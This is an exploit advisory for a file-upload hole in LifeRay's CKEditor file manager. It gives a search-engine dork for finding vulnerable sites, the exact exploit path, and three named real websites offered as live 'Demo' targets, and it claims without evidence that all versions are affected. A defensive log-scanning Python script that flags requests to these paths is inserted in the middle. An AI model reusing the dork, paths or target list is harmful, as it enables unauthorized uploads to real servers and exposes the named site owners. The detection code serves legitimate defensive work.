[+] Title: LifeRay File Upload (CKEditor Vulnerable)
[+] Date: 2020-04-20
[+] Author: h4shur
[+] team : Persian Security Group
[+] Vendor Homepage: www.liferay.com
[+] Software Link: www.liferay.com
[+] Tested on: Windows 10 & Google Chrome
[+] Version : All Versions
[+] Category : Web Application Bugs
[+] Vulnerable File: /browser.html
[+] Dork : inurl:/ckeditor/editor/filemanager/
### POC:
[+] Exploit : site.com/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html
### Note:
* If you look carefully, the exploit that friends found is in the folder (FCKeditor), and the exploit that I found is in the folder (CKeditor).
This exploit has been tested on all versions of LifeRay, and the file can be uploaded on all tested sites.
* Exploits found by friends (note the folder "FCKeditor"):
/html/js/editor/fckeditor/editor/filemanager/browser/liferay/browser.html
* Newly discovered exploits (see folder "CKeditor"):
/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html
* LifeRay allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Uploaded files represent a significant risk to applications.
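For defenders, an added example (not part of the original advisory): a Python access-log check that flags requests reaching the file manager directory under either editor folder listed above, after normalizing encoded or padded paths. The common/combined log layout and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# File manager directory under both editor folders named in the advisory.
FILEMANAGER = re.compile(
    r"^/html/js/editor/(fckeditor|ckeditor)/editor/filemanager(/|$)", re.IGNORECASE)
# Assumed common/combined access-log layout: ip - - [time] "METHOD target PROTO" status
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

def normalize_path(target):
    """Drop query/fragment, percent-decode twice, resolve empty, '.' and '..' segments."""
    path = re.split(r"[?#]", target, maxsplit=1)[0]
    for _ in range(2):  # second pass catches double encoding such as %2566
        path = unquote(path)
    parts = []
    for seg in path.replace("\\", "/").split("/"):
        if seg == "..":
            if parts:
                parts.pop()
        elif seg not in ("", "."):
            parts.append(seg)
    return "/" + "/".join(parts)

def scan(lines):
    """Return one finding per request that reaches either file manager folder."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not an access-log line in the assumed layout
        path = normalize_path(m["target"])
        hit = FILEMANAGER.match(path)
        if hit:
            findings.append({"ip": m["ip"], "method": m["method"], "path": path,
                             "folder": hit.group(1).lower(),
                             "served": m["status"].startswith("2")})
    return findings

# Constructed sample lines (documentation IP ranges), not taken from any real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Apr/2020:10:00:01 +0000] "GET /html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Apr/2020:10:00:05 +0000] "GET /html//js/editor/FCKeditor/editor/%66ilemanager/browser/liferay/browser.html?x=1 HTTP/1.1" 404 312',
    '203.0.113.5 - - [20/Apr/2020:10:00:09 +0000] "GET /web/guest/home HTTP/1.1" 200 20480',
    '192.0.2.10 - - [20/Apr/2020:10:00:12 +0000] "GET /html/js/editor/ckeditor/constructed-sample.js HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `served` set to `True` means the host answered with a 2xx status, so the file manager page is reachable there and should be restricted or removed.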
### Demo:
[+] http://assol-express.vetrf.ru/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html
[+] https://vyvchay.com/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html
[+] https://www.primar.org/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html
### Special Thanks:
* Po0ri4 & b4ckdo0r
### Contact Me :
* Telegram : @h4shur
* Email : h4shursec@gmail.com
* Instagram : @netedit0r
* twitter : @h4shur